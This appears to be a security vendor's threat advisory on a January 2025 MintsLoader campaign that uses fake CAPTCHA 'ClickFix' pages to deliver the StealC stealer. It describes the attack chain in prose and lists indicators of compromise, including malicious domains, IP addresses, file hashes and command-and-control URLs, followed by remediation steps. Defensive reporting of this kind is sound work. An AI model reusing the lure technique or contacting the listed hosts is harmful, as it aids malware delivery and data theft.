July 1, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Multiple IBM Products Vulnerabilities
January 27, 2025Multiple WordPress Plugins Vulnerabilities
January 27, 2025Multiple IBM Products Vulnerabilities
January 27, 2025Multiple WordPress Plugins Vulnerabilities
January 27, 2025
Severity
High
Analysis Summary
Threat hunters have uncovered an ongoing campaign leveraging MintsLoader, a PowerShell-based malware loader, to distribute secondary payloads such as the StealC information stealer and the legitimate open-source network computing platform BOINC. According to cybersecurity firm analysis, MintsLoader is delivered through spam emails containing links to KongTuke/ClickFix pages or an obfuscated JScript file.
The campaign, detected in January 2025, targets sectors such as electricity, oil and gas, and legal services in the U.S. and Europe. Attackers exploit fake CAPTCHA verification prompts on compromised websites to trick users into executing malicious PowerShell scripts. These prompts, known as ClickFix or KongTuke, inject scripts that load malicious code into a user’s clipboard and guide them to paste and execute it via the Windows Run prompt.
The attack chain begins with spam emails leading to the download of a JavaScript file that executes PowerShell commands to install MintsLoader. This PowerShell-based malware loader contacts a command-and-control (C2) server to download interim payloads, evade sandboxes using techniques like a Domain Generation Algorithm (DGA), and ultimately deploy StealC, an information stealer re-engineered from the Arkei stealer and sold as malware-as-a-service (MaaS). StealC avoids infecting systems in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.
Simultaneously, the Astolfo Loader (JinxLoader V3), a rewritten version of JinxLoader in C++, highlights the affordability and proliferation of malicious tools on hacking forums. Researchers also identified GootLoader campaigns using search engine optimization (SEO) poisoning to redirect users to compromised WordPress sites hosting fake forums. These sites dynamically load malware via a "mothership" server, employing obfuscation, geofencing, and IP blocking to evade detection, making remediation challenging even for site owners.
Together, these campaigns underline the evolving sophistication of malware operations and the continued use of deceptive social engineering techniques to target victims across industries.
Impact
- Sensitive Data Theft
- Financial Loss
Indicators of Compromise
Domain Name
- rosettahome.top
- xaides.com
- usbkits.com
- hkinuxb3bz.top
- mubuzb3vvv.top
- nfuvueibzi4.top
- mnudybh4unh.top
- nuvye89bjz4.top
- mbuz73hb7z3.top
- tubnzy3uvz.top
- nubxz4ubhxz9i.top
- poeiughybzu222.top
- poubnxu3jubz.top
- lgbibzuehbz.top
- ohunhebzhbu3.top
- sdubvlbbuz3vzzz.top
- bnbuzu49ibz4.top
- shd9inbjz4.top
- ngub8zb38ib.top
- gkn33hxueub.top
- mnvuz3gvy3.top
- jhubzgv3.top
- adkfnnbmakcgael.top
- hhgiflifcbmdjmh.top
- blclmjamegjaffd.top
- iblaehgffmflamn.top
- bfhdkgmmhdbikgj.top
- jjdgdeffjimfgne.top
- canjjclmlnicbga.top
- jejmbadfmeenlnk.top
- diebinjmajbkhhg.top
- kmaealcfcalhcac.top
- dckhgjimeghemhl.top
- lggknhaffleahbh.top
- ekbnfghmhcaldid.top
- lalclenfjhkinbn.top
- feheecfmkmhfiij.top
- midhkalfmddcece.top
- fnnkcnemajnnaja.top
- mdinjlkfcajkjck.top
- ghecbjcmdfghfkg.top
- nlafhhiffkceadc.top
- gbkiafbmhbmbkkl.top
- afglgehgjgjmgdh.top
- hjbamcnnkmfjbld.top
- anldfaggmdbglen.top
- idhglmmnaimdhlj.top
- bidjdlegcnincee.top
- immmjjkndeekmma.top
- ccibchdgfjbhhfk.top
- jgeeifjnhbledmg.top
- ckahaebgighbngc.top
- afnfdijahijefmh.top
- kcehmenjdibnmni.top
- kdemjgebjimkanl.top
- gajaechkfhfghal.top
- cmacnnkfbhlcncm.top
IP
- 145.223.100.233
- 67.217.228.118
- 45.61.136.138
MD5
46859e09844b9a698f15023607afa509
902c133812718bacf8e86a6d8bbeb22d
760f00e30887017cdea9809fd1c38e52
SHA-256
b8804a7ef09a9c1e8ede3a86a087b754b42f5b37c6de1e82c86f38d01c297ee2
138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa
91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3
SHA1
cdcc6faff70801edb2324d8472619d0b338f8080
23ae2fdaf0c85b08e13ef68d925997c08a19a1f9
b09271e96ff73b86bd54489fbae1c224369a8bc8
URL
- https://t1jm05fdu6748emu5oon8nix1uk2ogyn.lovesnextmeeting.com/Uswl5JAnXI
- http://mubuzb3vvv.top/1.php?s=527
- http://62.204.41.177/edd20096ecef326d.php
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.
- Block the execution of HTA files and restrict macros in email attachments and downloaded files.